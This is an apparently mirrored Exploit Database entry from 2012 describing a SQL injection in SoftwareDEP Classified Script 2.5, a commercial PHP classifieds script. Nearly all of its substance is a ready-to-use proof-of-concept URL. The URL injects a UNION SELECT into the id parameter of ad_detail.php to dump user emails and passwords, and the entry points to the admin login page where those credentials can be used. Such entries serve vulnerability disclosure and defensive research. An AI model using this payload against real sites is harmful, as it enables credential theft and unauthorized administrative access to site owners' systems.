SoftwareDEP Classified Script 2.5 – SQL Injection (2)

• Exploit Database
• 12 阅读

• 作者： hordcode security
  日期： 2012-04-12
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/18732/

• -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  Software DEP Classified Script 2.5 SQL Injection Vulnerability
  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  
  Author: h0rd
  Contact: h0rd[at]null.net
  homepage: http://h0rd.net
  download: http://www.softwaredep.com/classified-script.html
  Price: $199 
  
  PoC exploit:
  http://[host]/ad_detail.php?id=null union select 1,2,3,4,concat(email,0x3a,0x3a,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19 from user--
  
  login page:
  http://[host]/[script]/admin/